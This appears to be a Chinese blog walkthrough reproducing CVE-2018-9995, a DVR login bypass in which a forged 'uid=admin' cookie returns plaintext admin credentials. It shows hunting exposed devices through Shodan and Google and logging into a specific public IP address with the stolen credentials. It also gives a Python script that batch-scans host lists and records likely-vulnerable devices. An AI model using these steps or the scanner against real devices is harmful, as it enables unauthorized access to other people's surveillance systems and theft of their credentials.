• DVR登录绕过漏洞_CVE-2018-9995漏洞复现


    DVR登录绕过漏洞_CVE-2018-9995漏洞复现

    一、漏洞描述

    此漏洞允许攻击者通过修改”Cookie:uid=admin”之后访问特定DVR的控制面板,返回此设备的明文管理员凭证。

    二、影响软件以及版本

    Novo

    CeNova

    QSee

    Pulnix

    XVR 5 in 1 (title: "XVR Login")

    Securus, - Security. Never Compromise !! -

    Night OWL

    DVR Login

    HVR Login

    MDVR Login

    三、漏洞复现

    1、搜索引擎获取有可能存在漏洞的设备

    使用shodan、google等搜索引擎

      

      

    2、访问http://114.33.109.175/login.rsp

      

    3、burp抓包,构造poc,放包发现获得登录凭证

      

    4、使用获得账户密码登录,成功登录

      

    5、批量检查是否存在CVE-2018-9995漏洞(poc),脚本如下

    import sys 
    import requests
    import re
     
    def check_host(host):
     
        try:
     
            print("Checking : %s"%host)
     
            url = 'http://' + host+'/login.rsp'
     
            rr= requests.get(url,timeout=30,allow_redirects=False)
     
            if rr.status_code == 200 and re.findall("GNU rsp/1.0", rr.headers["Server"]):
     
                print("[*] CVE-2018-9995 Detection :Url is %s"%url)
     
                ff=open('result.txt','a+')
     
                ff.write('%s
    '%(url))
     
        except:
     
            pass
     
    if __name__ == '__main__':
     
        if len(sys.argv) < 2:
     
            print("""Usage: Python3 CVE-2018-9995.py host.txt
     
    host.txt:127.0.0.1:8080 or baidu.com
     
    """)
     
        if len(sys.argv) >= 2:
     
            file = open(sys.argv[1])
     
            for i in file:
     
                i = i.strip()
     
                check_host(i)
     
            file.close()

    6、运行脚本

      

     

  • 相关阅读:
    JVM性能调优监控工具jps、jstack、jmap、jhat、jstat、jinfo、jconsole使用详解
    Spark入Hbase的四种方式效率对比
    redis的三种集群方式
    记Springcloud Config Service整合gitlab一坑
    移动开发day2_css预处理器_flex布局
    移动开发day1_过渡_2d转换_3d立体
    3月26-3月27号
    3月24号
    3月25号
    3月23日
  • 原文地址:https://www.cnblogs.com/yuzly/p/11105086.html
Copyright © 2020-2023  润新知